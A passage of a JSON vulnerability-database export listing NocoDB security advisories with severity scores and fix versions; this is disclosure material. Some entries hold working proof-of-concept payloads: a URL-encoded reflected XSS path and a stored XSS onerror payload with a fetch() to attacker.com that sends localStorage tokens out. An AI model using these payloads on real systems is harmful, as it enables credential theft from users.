`public-metas.service.ts`, and `calendar-datas.service.ts`.\n\n### Impact\nIf the database is compromised, shared view passwords are immediately readable. 
Risk is limited to password reuse scenarios.\n\n### Credit\nThis issue was reported by [@Tulgaaaaaaaa](https://github.com/Tulgaaaaaaaa).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28360","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.14091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28360"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:01:13Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-mpp2-x7wv-38hv","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:01:13Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-mpp2-x7wv-38hv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28360","reference_id
":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28360"},{"reference_url":"https://github.com/advisories/GHSA-mpp2-x7wv-38hv","reference_id":"GHSA-mpp2-x7wv-38hv","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpp2-x7wv-38hv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28360","GHSA-mpp2-x7wv-38hv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n449-xc5n-yuf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21346?format=json","vulnerability_id":"VCID-nbre-gc8b-73af","summary":"NocoDB Vulnerable to User Enumeration via Password Reset Endpoint\n### Summary\nThe password forgot endpoint returned different responses for registered and unregistered emails, allowing user enumeration.\n\n### Details\n`POST /api/v2/auth/password/forgot` returned a success message for registered emails but `'Your email has not been registered.'` for unknown emails. 
The fix returns a uniform response regardless of whether the email exists.\n\n### Impact\nAn unauthenticated attacker can determine whether an email is registered. No credentials or data are exposed.\n\n### Credit\nThis issue was reported by [@Tulgaaaaaaaa](https://github.com/Tulgaaaaaaaa).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28358","reference_id":"","reference_type":"","scores":[{"value":"0.00599","scoring_system":"epss","scoring_elements":"0.69751","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28358"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:02:18Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:02:18Z/"}],"url":"
https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28358","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28358"},{"reference_url":"https://github.com/advisories/GHSA-387m-j3p9-3php","reference_id":"GHSA-387m-j3p9-3php","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-387m-j3p9-3php"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28358","GHSA-387m-j3p9-3php"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nbre-gc8b-73af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/34553?format=json","vulnerability_id":"VCID-p9mr-w1yp-mffa","summary":"nocodb SQL Injection vulnerability\n## Summary\n\nNocoDB contains a SQL injection vulnerability that allows an authenticated attacker with creator access to query the underlying database.\n\n## Product\n\nnocodb/nocodb\n\n## Tested Version\n\n[0.109.2](https://github.com/nocodb/nocodb/releases/tag/0.109.2)\n\n## Details\n\n### SQL injection in `SqliteClient.ts` 
(`GHSL-2023-141`)\nBy supplying a specially crafted payload to the parameter and endpoint given below, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injection, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.\n\nThe [`triggerList`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654) method creates a SQL query using the user-controlled [`table_name`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637) parameter value from the [`tableCreate`](https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63) endpoint.\n\n```javascript\nasync triggerList(args: any = {}) {\n  const _func = this.triggerList.name;\n  const result = new Result();\n  log.api(`${_func}:args:`, args);\n\n  try {\n    args.databaseName = this.connectionConfig.connection.database;\n\n    const response = await this.sqlClient.raw(\n      `select *, name as trigger_name from sqlite_master where type = 'trigger' and tbl_name='${args.tn}';`,\n    );\n[...]\n```\n\n#### Impact\n\nThis issue may lead to `Information Disclosure`.\n\n## Credit\n\nThis issue was discovered and reported by GHSL team member [@sylwia-budzynska (Sylwia Budzynska)](https://github.com/sylwia-budzynska).\n\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure 
policy](https://securitylab.github.com/advisories#policy).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43794","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.5252","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43794"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/controllers/tables.controller.ts#L63"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L628-L654"},{"reference_url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637","reference_id":"","reference_type"
:"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/blob/3ec82824eeb2295f6b67fd67e7d6049784b41221/packages/nocodb/src/db/sql-client/lib/sqlite/SqliteClient.ts#L637"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3m5q-q39v-xf8f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-13T15:57:00Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3m5q-q39v-xf8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43794","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43794"},{"reference_url":"https://github.com/advisories/GHSA-3m5q-q39v-xf8f","reference_id":"GHSA-3m5q-q39v-xf8f","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3m5q-q39v-xf8f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66924?format=json","purl":"pkg:npm/nocodb@0.111.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"
VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.111.0"}],"aliases":["CVE-2023-43794","GHSA-3m5q-q39v-xf8f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p9mr-w1yp-mffa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/32656?format=json","vulnerability_id":"VCID-pes6-6f16-s7de","summary":"NocoDB Vulnerable to Reflected Cross-Site Scripting on Reset Password Page\n### Summary\n\nThe API endpoint related to the password reset function is vulnerable to Reflected Cross-Site-Scripting. \n\n### Details\n\nThroughout the source-code analysis, it has been found that the endpoint /api/v1/db/auth/password/reset/:tokenId is vulnerable to Reflected Cross-Site-Scripting.\n \nThe flaw occurs due to implementation of the client-side template engine ejs, specifically on file resetPassword.ts where the template is using the insecure function “<%-“ \nhttps://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71  \nwhich is rendered by the function renderPasswordReset: \nhttps://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251\n\n### PoC\n\nSend the request below to a vulnerable instance: \n`/api/v1/db/auth/password/reset/asdsad%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E/`\n\n![image](https://github.com/user-attachments/assets/28d8e7c6-efb9-49df-b049-56dab229d74f)\n\n### Impact\n\nThe vulnerability affect end-users, allowing an attacker to craft 
and send a malicious link to the victim which leads to a script running in their browser.\n\n### Credits\n[l34k3d](https://github.com/xL34K3D)\n[ottoboni](https://github.com/gabrielott)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27506","reference_id":"","reference_type":"","scores":[{"value":"0.03816","scoring_system":"epss","scoring_elements":"0.88306","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27506"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/auth.controller.ts#L251"},{"reference_url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/
S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/blob/ba5a191b33259d984fc92df225f7d82ede2ddb56/packages/nocodb/src/modules/auth/ui/auth/resetPassword.ts#L71"},{"reference_url":"https://github.com/nocodb/nocodb/commit/ea821edb133e621e26183ae65c8ff9ee5d6f2723","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/commit/ea821edb133e621e26183ae65c8ff9ee5d6f2723"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wf6c-hrhf-86cw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-06T19:12:15Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wf6c-hrhf-86cw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27506","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vul
n/detail/CVE-2025-27506"},{"reference_url":"https://github.com/advisories/GHSA-wf6c-hrhf-86cw","reference_id":"GHSA-wf6c-hrhf-86cw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wf6c-hrhf-86cw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65100?format=json","purl":"pkg:npm/nocodb@0.258.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.258.0"}],"aliases":["CVE-2025-27506","GHSA-wf6c-hrhf-86cw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pes6-6f16-s7de"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15150?format=json","vulnerability_id":"VCID-tpc8-v7f5-73dg","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue\n### Summary\nA stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.\n\n### Details\nThe nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of \"urls\" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag <a> with href=XXX. 
However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which lets a malicious user create a malicious table with a formula field whose payload is <img src=1 onerror=\"malicious javascripts\"URI::(XXX). The malicious user can then share this table with others by enabling public viewing, and the victims who open the shared link can be attacked.\n\n### PoC\nStep 1: The attacker logs in to NocoDB and creates a table with two fields, \"T\" and \"F\". The type of field \"T\" is \"SingleLineText\", and the type of \"F\" is \"Formula\" with the formula content {T}\nStep 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)\nStep 3: The attacker clicks the \"Share\" button and enables public viewing, then copies the shared link and sends it to the victims\nStep 4: Any victim who opens the shared link in their browser will see the alert with their confidential tokens stored in localStorage\n\nThe attackers can use fetch([http://attacker.com/?localStorage.getItem('nocodb-gui-v2')](http://attacker.com/?localStorage.getItem(%27nocodb-gui-v2%27))) to replace the alert and then steal the victims' credentials via their attacker.com website.\n\n### Impact\nStealing the credentials of any NocoDB user who opens the malicious 
link.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49781","reference_id":"","reference_type":"","scores":[{"value":"0.01372","scoring_system":"epss","scoring_elements":"0.80533","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49781"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-13T19:49:05Z/"}],"url":"https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-13T19:49:05Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49781","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I
:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49781"},{"reference_url":"https://github.com/advisories/GHSA-h6r4-xvw6-jc5h","reference_id":"GHSA-h6r4-xvw6-jc5h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h6r4-xvw6-jc5h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44510?format=json","purl":"pkg:npm/nocodb@0.202.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-q5wh-8at8-87d2"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.202.9"}],"aliases":["CVE-2023-49781","GHSA-h6r4-xvw6-jc5h"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tpc8-v7f5-73dg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21314?format=json","vulnerability_id":"VCID-vs5e-zmcs-8kam","summary":"NocoDB's Refresh Tokens Not Revoked on Password Reset\n### Summary\nThe password reset flow did not revoke existing refresh tokens, allowing an attacker with a previously stolen refresh token to continue minting valid JWTs after the victim resets their password.\n\n### Details\n`passwordReset()` in 
`users.service.ts` updated `token_version` (invalidating JWTs) but did not call `UserRefreshToken.deleteAllUserToken()`. The `refreshToken()` method only checked token existence, not `token_version`. Both `passwordChange()` and `signOut()` correctly deleted all refresh tokens.\n\n### Impact\nAn attacker who previously obtained a refresh token retains access after password reset until the token expires.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) 